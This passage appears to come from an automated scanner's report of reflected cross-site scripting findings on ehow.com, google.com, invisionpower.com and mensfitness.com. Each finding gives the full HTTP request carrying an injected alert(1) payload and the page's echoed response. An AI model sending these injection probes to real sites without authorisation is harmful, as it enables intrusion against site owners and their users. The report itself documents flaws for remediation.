Set-Cookie: recentviewed=8047; expires=Thu, 02-Feb-2012 15:16:13 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41383

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Water Garden Fountains 101 | eHow.com
</title>
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_8047_water-garden-fountains-101.html?5fda0'-alert(1)-'099222e590f=1" ref="like" width="300">
...[SNIP]...

4.429. http://www.ehow.com/toys-and-games/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/toys-and-games/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2468c'-alert(1)-'bd803265f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /toys-and-games/?2468c'-alert(1)-'bd803265f69=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72358

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Toys & Games - How To Information | eHow.com</tit
...[SNIP]...
<fb:like href="http://www.ehow.com/toys-and-games/?2468c'-alert(1)-'bd803265f69=1" ref="like" width="300">
...[SNIP]...

4.430. http://www.ehow.com/us-travel/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/us-travel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d2a7'-alert(1)-'c41efa4ef38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /us-travel/?9d2a7'-alert(1)-'c41efa4ef38=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74677

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>US Travel - How To Information | eHow.com</title>
...[SNIP]...
<fb:like href="http://www.ehow.com/us-travel/?9d2a7'-alert(1)-'c41efa4ef38=1" ref="like" width="300">
...[SNIP]...

4.431. http://www.ehow.com/vacations-and-travel-planning/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/vacations-and-travel-planning/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b79c'-alert(1)-'5e746d16608 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /vacations-and-travel-planning/?2b79c'-alert(1)-'5e746d16608=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75294

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Vacations & Travel Planning - How To Information
...[SNIP]...
<fb:like href="http://www.ehow.com/vacations-and-travel-planning/?2b79c'-alert(1)-'5e746d16608=1" ref="like" width="300">
...[SNIP]...

4.432. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_6598099_make-sugar-spice-scrub.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df61'-alert(1)-'9bca15399b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /video_6598099_make-sugar-spice-scrub.html?3df61'-alert(1)-'9bca15399b4=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83575

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre
...[SNIP]...
6682/flash/36cbefe4-4d7a-49a0-b6a2-b38d82d69318.flv',
                   cp: '',
                   pid: '',
                   demand_playlistid: '',
                   from_url: 'http%3a%2f%2fwww.ehow.com%2fvideo_6598099_make-sugar-spice-scrub.html%3f3df61'-alert(1)-'9bca15399b4%3d1'
               },vars||{});

               var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC");
               videoSWFObject.addParam("allowScriptAccess", "
...[SNIP]...

4.433. http://www.ehow.com/video_6976779_sensational-snacks.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_6976779_sensational-snacks.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50c27'-alert(1)-'7bea5207a21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /video_6976779_sensational-snacks.html?50c27'-alert(1)-'7bea5207a21=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:48 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74883

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sensational Snacks: Cooking With Kids! | eHow.com
...[SNIP]...
2929161c/flash/5f4e164e-209c-4174-b27d-a612550fe832.flv',
                   cp: '',
                   pid: '',
                   demand_playlistid: '',
                   from_url: 'http%3a%2f%2fwww.ehow.com%2fvideo_6976779_sensational-snacks.html%3f50c27'-alert(1)-'7bea5207a21%3d1'
               },vars||{});

               var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC");
               videoSWFObject.addParam("allowScriptAccess", "
...[SNIP]...

4.434. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_7199214_onion-flatbread-recipe.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe44'-alert(1)-'7efe9cc39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /video_7199214_onion-flatbread-recipe.html?abe44'-alert(1)-'7efe9cc39a0=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 85016

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Onion Flatbread Recipe: Grow. Cook. Eat. | eHow.c
...[SNIP]...
39a2/flash/b7cb4c07-5655-4d80-bb2d-96d591bffe97.flv',
                   cp: '',
                   pid: '',
                   demand_playlistid: '',
                   from_url: 'http%3a%2f%2fwww.ehow.com%2fvideo_7199214_onion-flatbread-recipe.html%3fabe44'-alert(1)-'7efe9cc39a0%3d1'
               },vars||{});

               var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC");
               videoSWFObject.addParam("allowScriptAccess", "
...[SNIP]...

4.435. http://www.ehow.com/weddings-and-parties/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/weddings-and-parties/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de308'-alert(1)-'4a8b2e9f3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /weddings-and-parties/?de308'-alert(1)-'4a8b2e9f3c2=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71835

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Weddings & Parties - How To Information | eHow.co
...[SNIP]...
<fb:like href="http://www.ehow.com/weddings-and-parties/?de308'-alert(1)-'4a8b2e9f3c2=1" ref="like" width="300">
...[SNIP]...

4.436. http://www.ehow.com/weight-management-and-body-image/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/weight-management-and-body-image/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2da39'-alert(1)-'64118fe1441 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /weight-management-and-body-image/?2da39'-alert(1)-'64118fe1441=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71939

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Weight Management & Body Image - How To Informati
...[SNIP]...
<fb:like href="http://www.ehow.com/weight-management-and-body-image/?2da39'-alert(1)-'64118fe1441=1" ref="like" width="300">
...[SNIP]...

4.437. http://www.google.com/advanced_search [hl parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 20c64(a)bb11cc7cdf6 was submitted in the hl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?q=millenium+boston&hl=en20c64(a)bb11cc7cdf6&prmd=ivnscm HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
alse,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dmillenium+boston\x26amp;hl\x3den20c64(a)bb11cc7cdf6\x26amp;prmd\x3divnscm')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

4.438. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15b95(a)f122f347a32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscm&15b95(a)f122f347a32=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
ogle.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dmillenium+boston\x26amp;hl\x3den\x26amp;prmd\x3divnscm\x26amp;15b95(a)f122f347a32\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

4.439. http://www.google.com/advanced_search [prmd parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a68a8(a)2fc3268e051 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscma68a8(a)2fc3268e051 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
);}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dmillenium+boston\x26amp;hl\x3den\x26amp;prmd\x3divnscma68a8(a)2fc3268e051')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

4.440. http://www.google.com/advanced_search [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b05a6(a)914fa9d20b7 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?q=millenium+bostonb05a6(a)914fa9d20b7&hl=en&prmd=ivnscm HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

4.441. http://www.google.com/images [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/images

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 417bd(a)c494a2ec40e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /images?q=millenium+boston417bd(a)c494a2ec40e&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:53:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston417bd(a)c494a2ec40e - Google Search</title><script>window.google={kEI:"8n1JTfbJNcX_lge7odHi
...[SNIP]...
location.hash;if(a&&a.indexOf("start")>-1){var b=window.dyn.setResults;window.dyn.setResults=function(){window.dyn.setResults=b}}}v();
}) ();dyn.initialize('\x26prev\x3d/images%3Fq%3Dmillenium%2Bboston417bd(a)c494a2ec40e%26um%3D1%26hl%3Den%26sa%3DN%26tbs%3Disch:1\x26ei\x3d8n1JTfbJNcX_lge7odHiDw',0,1);dyn.setResults([]);</script>
...[SNIP]...

4.442. http://www.invisionpower.com/index.php [79b73' parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/index.php

Issue detail

The value of the 79b73' request parameter is copied into the HTML document as plain text between tags. The payload 43785<script>alert(1)</script>8587ea4b601 was submitted in the 79b73' parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?79b73'43785<script>alert(1)</script>8587ea4b601 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:47:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<br />
/index.php?79b73'43785<script>alert(1)</script>8587ea4b601
</div>
...[SNIP]...

4.443. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24714<script>alert(1)</script>6e8c7271658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?24714<script>alert(1)</script>6e8c7271658=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:47:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<br />
/index.php?24714<script>alert(1)</script>6e8c7271658=1
</div>
...[SNIP]...

4.444. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f9d9"><img%20src%3da%20onerror%3dalert(1)>35c645f95fa was submitted in the REST URL parameter 1. This input was echoed as 9f9d9"><img src=a onerror=alert(1)>35c645f95fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

